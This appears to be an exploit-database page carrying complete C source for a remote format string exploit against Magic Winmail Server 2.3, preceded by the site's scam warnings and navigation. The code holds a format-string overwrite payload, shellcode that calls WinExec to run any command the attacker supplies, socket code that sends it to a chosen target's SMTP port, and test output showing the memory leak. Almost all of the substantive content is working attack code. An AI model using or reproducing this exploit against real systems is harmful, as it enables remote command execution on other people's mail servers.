0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Winmail Mail Server 2.3 Remote Format String Exploit
==================================================== Winmail Mail Server 2.3 Remote Format String Exploit ==================================================== /****************************************************************** * Magic Winmail Server 2.3(Build 0402) * Remote Format string exploit. ****************************************************************** * Coded by ThreaT. * * * This one take advantage of a format bug in the * >>> SMTP protocol <<< (not pop3) for execute * a malicious command on a vulnerable system * * usage : mwmxploit <Target IP> <command to execute remotely> [smtp port] * + The command to execute cannot exceed 90 characters + * * compile : cl.exe mwmxploit.c /w * ****************************************************************** */ #include <windows.h> #include <winsock.h> #pragma comment (lib,"wsock32.lib") void main (int argc, char *argv[]) { SOCKET sock; char buffer[1000]; int i; // ecrasement d'un saved EIP gr?ce aux caract?res de format char vuln[] = "\xec\xfc\x66\x01%x%x" "\xed\xfc\x66\x01%x%x" "\xee\xfc\x66\x01" "%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n" "%97x%n%105x%hn" /* This is my specific shellcode for execute a command over the Magic Winmail process. This one can contain null bytes, enjoy ! :) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Disassembly of File: mailserver.exe Code Offset = 00001000, Code Size = 000CF000 Data Offset = 000EC000, Data Size = 0002E000 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Reference To: KERNEL32.GetModuleHandleA, Ord:0000h :004B8850 FF15AC014D00 Call dword ptr [004D01AC] Reference To: KERNEL32.ExitProcess, Ord:0000h :004B88C6 FF1598014D00 Call dword ptr [004D0198] Reference To: KERNEL32.GetProcAddress, Ord:0000h :00406CE7 8B3DEC004D00 mov edi, dword ptr [004D00EC] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= //////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\ : EB50 jmp 00401058 : 5E pop esi : 8BEC mov ebp, esp : 83EC28 sub esp, 00000028 // je cree un stack : C745D84B65726E mov [ebp-28], 6E72654B : C745DC656C3332 mov [ebp-24], 32336C65 // j'y place 'Kernel32' : C745E000000000 mov [ebp-20], 00000000 : C745E457696E45 mov [ebp-1C], 456E6957 : C745E878656300 mov [ebp-18], 00636578 // ici 'WinExec' // adaptez le shellcode en virant cette ligne si vraiment vous avez besoin // de 4 caract?res de plus pour la commande ? executer : C645EB00 mov [ebp-15], 00 : BAAC014D00 mov edx, 004D01AC : 8D45D8 lea eax, dword ptr [ebp-28] : 50 push eax : FF12 call dword ptr [edx] // eax = GetModuleHandle ("Kernel32"); : 8D5DE4 lea ebx, dword ptr [ebp-1C] : 53 push ebx : 50 push eax : BAEC004D00 mov edx, 004D00EC : FF12 call dword ptr [edx] // GetProcAdress (eax, "WinExec"); : 6A01 push 00000001 // 1 = SW_SHOW, 0 = SW_HIDE : 56 push esi : FFD0 call eax // WinExec (argv[2], SW_SHOW) : BA98014D00 mov edx, 004D0198 : FF12 call dword ptr [edx] // ExitProcess (); : E8ABFFFFFF call 00401008 \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF ///////////////////////////////// */ // Generated by Hex Workshop // shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057) "\x00\x90\x90\x90\x90" // sa, c'est pour bien coller "\xEB\x50\x5E\x8B\xEC\x83\xEC\x28\xC7\x45\xD8\x4B\x65\x72\x6E\xC7" "\x45\xDC\x65\x6C\x33\x32\xC7\x45\xE0\x00\x00\x00\x00\xC7\x45\xE4" "\x57\x69\x6E\x45\xC7\x45\xE8\x78\x65\x63\x00\xC6\x45\xEB\x00\xBA" "\xAC\x01\x4D\x00\x8D\x45\xD8\x50\xFF\x12\x8D\x5D\xE4\x53\x50\xBA" "\xEC\x00\x4D\x00\xFF\x12\x6A\x01\x56\xFF\xD0\xBA\x98\x01\x4D\x00" "\xFF\x12\xE8\xAB\xFF\xFF\xFF"; SOCKADDR_IN sin; WSADATA wsadata; WORD wVersionRequested = MAKEWORD (2,0); // printf ("* #################################### *\n" " Magic Winmail Server 2.3(Build 0402)\n" " Remote format string exploit !\n" "* #################################### *\n" " Coded By ThreaT -> ThreaT\n\n"); if (argc < 3 || strlen (argv[2]) > 90) { printf ("usage : mwmxploit <Target IP> <command to execute> [smtp port]\n\n" " + The command to execute cannot exceed 90 characters +\n"); ExitProcess (0); } if ( WSAStartup(wVersionRequested, &wsadata) ) { printf ("Erreur d'initialisation winsock !\n"); ExitProcess (1); } sin.sin_family = AF_INET; sin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25); if ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE) { printf ("Erreur : L'adresse IP de la victime est incorrect !\n"); ExitProcess (2); } printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port ) ); sock = socket (AF_INET, SOCK_STREAM, 0); if ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) ) { printf ("erreur : connexion impossible !\n"); ExitProcess (3); } recv (sock,buffer,1000,0); printf ("ok\n-> %s\nsending exploit code...",buffer); send (sock, vuln, strlen (vuln) + 92, 0); // envoi du shellcode send (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande send (sock, "\r\n", 2, 0); // validation recv (sock,buffer,1000,0); // remote crash :) puts ("ok"); } /* D:\toolz\netcat>nc 127.0.0.1 25 220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready AAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%. 8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 502 unimplemented (#5.5.1) */ /* D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log" 0906/Y-01:50:30 1548 Connect from 127.0.0.1 0906/Y-01:51:06 1584 unrecognized command = AAAA 0x00498f71 0x0176fd10 0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102 0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0 0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141 0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25 0x25783020 0x2078382e 0x2e257830 */ # 0day.today [2024-11-16] #